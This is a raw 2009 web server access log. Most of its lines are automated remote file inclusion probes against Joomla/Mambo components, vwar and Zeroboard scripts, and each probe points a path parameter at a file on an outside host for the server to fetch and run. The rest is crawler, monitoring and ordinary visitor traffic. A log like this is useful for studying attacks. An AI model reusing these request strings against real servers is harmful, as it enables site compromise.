89.108.66.115 - - [03/Aug/2009:03:59:27 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.812"
121.78.116.209 - - [03/Aug/2009:03:59:41 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.116.209 - - [03/Aug/2009:04:00:07 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.92.219.219 - - [03/Aug/2009:04:02:27 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.92.219.219 - - [03/Aug/2009:04:02:52 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:04:03:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [03/Aug/2009:04:03:12 -0400] "GET /logs/error_log.Q109061000//?option=com_chronocontact&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:04:03:12 -0400] "GET //?option=com_chronocontact&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:04:03:12 -0400] "GET /logs//?option=com_chronocontact&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:04:04:26 -0400] "GET /logs/access_log.Q109061000//?option=com_chronocontact&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
211.189.39.159 - - [03/Aug/2009:04:04:39 -0400] "GET //outlogin.php?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.189.39.159 - - [03/Aug/2009:04:04:39 -0400] "GET /logs/access_log.Q109070500//outlogin.php?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.189.39.159 - - [03/Aug/2009:04:04:39 -0400] "GET /logs//outlogin.php?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:06:55 -0400] "GET /administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:06:55 -0400] "GET /logs/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:06:55 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:06:58 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:07:08 -0400] "GET /administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:07:08 -0400] "GET /logs/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:07:08 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:07:08 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.13.132.188 - - [03/Aug/2009:04:07:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:07:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:07:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:07:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:07:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
89.108.66.115 - - [03/Aug/2009:04:08:16 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.812"
89.108.66.115 - - [03/Aug/2009:04:08:17 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.812"
89.108.66.115 - - [03/Aug/2009:04:08:17 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.812"
209.59.12.99 - - [03/Aug/2009:04:08:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [03/Aug/2009:04:09:17 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.otr.co.kr/bbs/files/.dat/filesys/incoming/1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:10:04 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:10:04 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:10:11 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:10:11 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/admin.juser.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:04:11:22 -0400] "GET /calendre/config.php?inc_dir=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
200.93.147.154 - - [03/Aug/2009:04:11:24 -0400] "GET /logs/calendre/config.php?inc_dir=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.59.12.99 - - [03/Aug/2009:04:13:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.13.132.188 - - [03/Aug/2009:04:15:18 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:15:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:15:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
121.13.132.188 - - [03/Aug/2009:04:15:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; CIBA; 360SE)"
85.119.154.129 - - [03/Aug/2009:04:15:59 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.119.154.129 - - [03/Aug/2009:04:16:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
74.53.201.178 - - [03/Aug/2009:04:16:11 -0400] "GET /logs/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:16:11 -0400] "GET /administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:16:11 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:16:11 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:04:16:46 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L208806444A618500374D080+WSEQ(S0060):1+OUITEM(A0200):5096000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.47.80.39 - - [03/Aug/2009:04:16:56 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.39 - - [03/Aug/2009:04:16:56 -0400] "GET /logs/access_log.Q108071400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
74.53.201.178 - - [03/Aug/2009:04:16:57 -0400] "GET /logs/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:16:57 -0400] "GET /administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:58 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:58 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:58 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:59 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:59 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:16:59 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:16:59 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:17:03 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:05 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:05 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:05 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:06 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:06 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:06 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:09 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:17:10 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:04:17:33 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.93.147.154 - - [03/Aug/2009:04:17:34 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.92.219.219 - - [03/Aug/2009:04:17:40 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.adribessa.com//administrator/components/com_links/1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.181.7.115 - - [03/Aug/2009:04:17:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
89.108.66.115 - - [03/Aug/2009:04:18:06 -0400] "GET /logs/access_log.Q109071300///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.812"
222.122.197.50 - - [03/Aug/2009:04:18:37 -0400] "GET /logs//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.197.50 - - [03/Aug/2009:04:18:37 -0400] "GET //index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.197.50 - - [03/Aug/2009:04:18:38 -0400] "GET /logs/access_log.Q109051900//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:04:18:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:52 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:56 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:56 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:56 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:58 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:58 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:18:58 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:00 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:02 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:04:19:04 -0400] "GET /logs//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:04:19:05 -0400] "GET //bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:04:19:08 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:19:23 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:19:23 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:35 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:35 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:35 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:19:39 -0400] "GET /logs/access_log.Q109051000//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:20:04 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:20:04 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/admin.juser.html.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
123.125.66.118 - - [03/Aug/2009:04:20:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.93.147.154 - - [03/Aug/2009:04:20:18 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
200.93.147.154 - - [03/Aug/2009:04:20:23 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
200.93.147.154 - - [03/Aug/2009:04:20:23 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/ernie212/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
64.191.102.117 - - [03/Aug/2009:04:20:28 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:20:28 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:20:28 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:20:33 -0400] "GET /logs/access_log.Q109051000//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
